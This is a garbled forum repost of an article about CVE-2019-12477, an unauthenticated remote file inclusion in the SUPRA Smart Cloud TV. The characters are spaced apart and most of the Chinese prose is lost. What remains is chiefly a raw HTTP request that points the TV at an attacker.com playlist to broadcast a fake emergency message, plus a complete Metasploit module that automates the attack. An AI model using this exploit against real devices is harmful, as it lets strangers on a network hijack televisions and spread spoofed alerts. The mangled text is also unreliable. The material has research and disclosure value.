[14375] 2019-07-21_看我如何玩转SUPRA智能云电视

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2019-07-21_看我如何玩转SUPRA智能云电视 S U P R A c l o u d s   F r e e B u f   2 0 1 9 - 0 7 - 2 1 D h i r a j   M i s h r a   S U P R A C V E - 2 0 1 9 - 1 2 4 7 7 S U P R A 线 广 线 广 S U P R A D h i r a j   M i s h r a ' o p e n L i v e U R L ( ) ' S U P R A M i s h r a U R L D h i r a j   M i s h r a   / r e m o t e / m e d i a _ c o n t r o l ? a c t i o n = s e t U r i & u r i = U R I o p e n L i v e T V ( u r l ) o p e n L i v e T V ( u r l ) 线 S U P R A S U P R A P O C S U P R A E m e r g e n c y   A l e r t   S y s t e m M e t a s p l o i t   m s f   e x p l o i t * c l o u d s F r e e B u f . C O M f u n c t i o n   o p e n L i v e T V ( u r l )     {     $ . g e t ( " / r e m o t e / m e d i a _ c o n t r o l " ,   { m _ a c t i o n : ' s e t U r i ' , m _ u r i : u r l , m _ t y p e : ' v i d e o / * ' } ,       f u n c t i o n   ( d a t a ,   t e x t S t a t u s ) {       i f ( " s u c c e s s " = = t e x t S t a t u s ) {         a l e r t ( t e x t S t a t u s ) ;       } G E T   / r e m o t e / m e d i a _ c o n t r o l ? a c t i o n = s e t U r i & u r i = h t t p : / / a t t a c k e r . c o m / f a k e _ b r o a d c a s t _ m e s s a g e . m 3 u 8   H T T P / 1 . 1 H o s t :   1 9 2 . 1 6 8 . 1 . 1 5 5 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( M a c i n t o s h ;   I n t e l   M a c   O S   X   1 0 . 1 4 ;   r v : 6 6 . 0 )   G e c k o / 2 0 1 0 0 1 0 1   F i r e f o x / 6 6 . 0 A c c e p t :   t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , * / * ; q = 0 . 8 A c c e p t - L a n g u a g e :   e n - U S , e n ; q = 0 . 5 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e C o n n e c t i o n :   c l o s e U p g r a d e - I n s e c u r e - R e q u e s t s :   1 h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 5 5 / r e m o t e / m e d i a _ c o n t r o l ? a c t i o n = s e t U r i & u r i = h t t p : / / a t t a c k e r . c o m / f a k e _ b r o a d c a s t _ m e s s a g e . m 3 u 8 # # #   T h i s   m o d u l e   r e q u i r e s   M e t a s p l o i t :   h t t p s : / / m e t a s p l o i t . c o m / d o w n l o a d #   C u r r e n t   s o u r c e :   h t t p s : / / g i t h u b . c o m / r a p i d 7 / m e t a s p l o i t - f r a m e w o r k # # c l a s s   M e t a s p l o i t M o d u l e   <   M s f : : A u x i l i a r y     i n c l u d e   M s f : : E x p l o i t : : R e m o t e : : H t t p C l i e n t     i n c l u d e   M s f : : E x p l o i t : : R e m o t e : : H t t p S e r v e r     d e f   i n i t i a l i z e ( i n f o   =   { } )         s u p e r ( u p d a t e _ i n f o ( i n f o ,             ' N a m e '                       = >   ' S u p r a   S m a r t   C l o u d   T V   R e m o t e   F i l e   I n c l u s i o n ' ,             ' D e s c r i p t i o n '         = >   % q {                 T h i s   m o d u l e   e x p l o i t s   a n   u n a u t h e n t i c a t e d   r e m o t e   f i l e   i n c l u s i o n   w h i c h                 e x i s t s   i n   S u p r a   S m a r t   C l o u d   T V .   T h e   m e d i a   c o n t r o l   f o r   t h e   d e v i c e   d o e s n ' t                 h a v e   a n y   s e s s i o n   m a n a g e m e n t   o r   a u t h e n t i c a t i o n .   L e v e r a g i n g   t h i s ,   a n                 a t t a c k e r   o n   t h e   l o c a l   n e t w o r k   c a n   s e n d   a   c r a f t e d   r e q u e s t   t o   b r o a d c a s t   a                 f a k e   v i d e o .             } ,             ' A u t h o r '                   = >   [                 ' D h i r a j   M i s h r a ' ,   #   D i s c o v e r y ,   P o C ,   a n d   m o d u l e                 ' w v u '                         #   M o d u l e             ] ,             ' R e f e r e n c e s '           = >   [                 [ ' C V E ' ,   ' 2 0 1 9 - 1 2 4 7 7 ' ] ,                 [ ' U R L ' ,   ' h t t p s : / / w w w . i n p u t z e r o . i o / 2 0 1 9 / 0 6 / h a c k i n g - s m a r t - t v . h t m l ' ]             ] ,             ' D i s c l o s u r e D a t e '   = >   ' 2 0 1 9 - 0 6 - 0 3 ' ,             ' L i c e n s e '                 = >   M S F _ L I C E N S E         ) )         d e r e g i s t e r _ o p t i o n s ( ' U R I P A T H ' )     e n d     d e f   r u n         s t a r t _ s e r v i c e ( ' P a t h '   = >   ' / ' )         p r i n t _ s t a t u s ( " B r o a d c a s t i n g   E p i c   S a x   G u y   t o   # { p e e r } " )         r e s   =   s e n d _ r e q u e s t _ c g i (             ' m e t h o d '                 = >   ' G E T ' ,             ' u r i '                       = >   ' / r e m o t e / m e d i a _ c o n t r o l ' ,             ' e n c o d e _ p a r a m s '   = >   f a l s e ,             ' v a r s _ g e t '             = >   {                 ' a c t i o n '             = >   ' s e t U r i ' ,                 ' u r i '                   = >   g e t _ u r i   +   ' e p i c s a x . m 3 u 8 '             }         )         u n l e s s   r e s   & &   r e s . c o d e   = =   2 0 0   & &   r e s . b o d y . i n c l u d e ? ( ' O K ' )             p r i n t _ e r r o r ( ' N o   d o o - d o o d o o d o o d o o d o o - d o o   f o r   y o u ' )             r e t u r n         e n d         #   S l e e p   t i m e   c a l i b r a t e d   u s i n g   s u c c e s s f u l   p c a p         p r i n t _ g o o d ( ' D o o - d o o d o o d o o d o o d o o - d o o ' )         p r i n t _ s t a t u s ( ' S l e e p i n g   f o r   1 0 s   s e r v i n g   . m 3 u 8   a n d   . t s   f i l e s . . . ' )         s l e e p ( 1 0 )     e n d     d e f   o n _ r e q u e s t _ u r i ( c l i ,   r e q u e s t )         d i r   =   F i l e . j o i n ( M s f : : C o n f i g . d a t a _ d i r e c t o r y ,   ' e x p l o i t s ' ,   ' C V E - 2 0 1 9 - 1 2 4 7 7 ' )         f i l e s   =   {             ' / e p i c s a x . m 3 u 8 '   = >   ' a p p l i c a t i o n / x - m p e g U R L ' ,             ' / e p i c s a x 0 . t s '     = >   ' v i d e o / M P 2 T ' ,             ' / e p i c s a x 1 . t s '     = >   ' v i d e o / M P 2 T ' ,             ' / e p i c s a x 2 . t s '     = >   ' v i d e o / M P 2 T ' ,             ' / e p i c s a x 3 . t s '     = >   ' v i d e o / M P 2 T ' ,             ' / e p i c s a x 4 . t s '     = >   ' v i d e o / M P 2 T '         }         f i l e   =   r e q u e s t . u r i         u n l e s s   f i l e s . i n c l u d e ? ( f i l e )             v p r i n t _ e r r o r ( " S e n d i n g   4 0 4   f o r   # { f i l e } " )             r e t u r n   s e n d _ n o t _ f o u n d ( c l i )         e n d         d a t a   =   F i l e . r e a d ( F i l e . j o i n ( d i r ,   f i l e ) )         v p r i n t _ g o o d ( " S e n d i n g   # { f i l e } " )         s e n d _ r e s p o n s e ( c l i ,   d a t a ,   ' C o n t e n t - T y p e '   = >   f i l e s [ f i l e ] )     e n d e n d

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则